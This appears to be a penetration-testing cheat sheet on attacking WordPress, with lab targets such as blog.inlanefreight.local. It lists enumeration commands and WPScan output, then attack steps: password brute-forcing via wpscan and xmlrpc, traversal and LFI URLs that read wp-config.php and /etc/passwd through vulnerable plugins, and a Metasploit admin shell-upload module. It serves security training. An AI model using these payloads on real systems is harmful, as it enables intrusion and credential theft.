Wordpress
Enumeration (manual)
Browsing to Robot.txt file to identify a Wordpress site. The content of such file looks like this in Wordpress:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://inlanefreight.local/wp-sitemap.xmlInteresting files and folders:
wp-content/plugins
Plugins are stored here
wp-content/themes
Themes are stored in this directory
#Identify Wordpress
curl -s http://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" /
# msf module to enumerate logged on users on wordpress
Use auxiliary/scanner/http/wordpress_login_enum
Identify Themes
curl -s http://blog.inlanefreight.local/ | grep themesIdentify Plugins
curl -s http://blog.inlanefreight.local/ | grep pluginsIdentify the plugins version
Brows to the plugin identified (e.g.: http://blog.inlanefreight.local/wp-content/plugins/mail-masta/)
Identify readme.txt and extract version number and any other helpful information from it
Enumerating users
WPSCAN
Wpscan helps to identify Wordpress version, plugins, themes and vulnerabilities automatically and must faster than manually:
Enumeration
Use WPSCAN with an API token to get the identified vulnerabilities. You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
#Enumerate everything
wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token<SNIP>
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blog.inlanefreight.local/ [10.129.1.169]
[+] Started: Wed Oct 15 05:16:04 2025
Identify themes/plugins
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
wpscan --url http://www.cpent.com --enumerate tNote down all interesting findings from your enumeration phase before starting exploitation phase
Attacks
# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
# If xmlrpc is enabled, use it to brute force login credentials which is faster
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
#Mail-Masta vulnerable plugin LFI example
blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwdLook for known vulnerability with searchsploit
searchsploit wordpressupload a malicious plugin if you have admin privileges on the Wordpress application
#Msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
#Set options
set username xx
set password xx
set rhost 10.10.10.10
set rhost IP
set VHOST blog.wordpresswebsite.local
exploitLast updated